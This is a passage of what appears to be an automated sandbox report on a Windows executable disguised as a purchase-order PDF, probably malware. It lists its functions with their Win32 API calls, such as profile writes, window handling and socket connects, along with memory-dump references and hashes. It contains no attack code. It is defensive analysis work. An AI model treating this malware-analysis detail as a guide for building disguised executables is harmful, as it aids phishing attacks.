                                                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                                                                                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                                                                                                                                                                                            • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                                                                                                                                                                                                                            Function 0044796B Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00447997
                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004479A2
                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                                                                                                                                                                                                                                            • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1822080540-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                                                                                                                                                                                                            • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                                                                                                                                                                                                                                            Function 00447BAF Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 659298297-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                                                                                                                                                                                                                            Function 00447870 Relevance: 7.6, APIs: 5, Instructions: 94windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00447935
                                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1300944170-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                                                                                                                                                                                                                                            Function 00448837 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(00B71C40,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(00B71C40,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 142311417-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                                                                                                                                                                                                            • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                                                                                                                                                                                                                                            Function 00449549 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0044955A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004495C1
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004495CE
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1843234404-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                                                                                                                                                                                                                                                            Function 00455014 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                                                                                                                                                                                                                                            Function 00445719 Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00445721
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004457A3
                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3087257052-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8ba611301d3ba45eb1b80f84f3d8173e508d12df5c92d0c6dccacad37e84c94d
                                                                                                                                                                                                                                                                                                            • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ba611301d3ba45eb1b80f84f3d8173e508d12df5c92d0c6dccacad37e84c94d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                                                                                                                                                                                                                                            Function 00459DCF Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00459E07
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00459E44
                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                                                                                                                                                                                                            • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                                                                                                                                                                                                                                            Function 00464950 Relevance: 7.6, APIs: 5, Instructions: 68networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 00464985
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                                                                                                                                                                                                                                            • connect.WSOCK32(00000000,00000000,00000010), ref: 004649CD
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00464A07
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
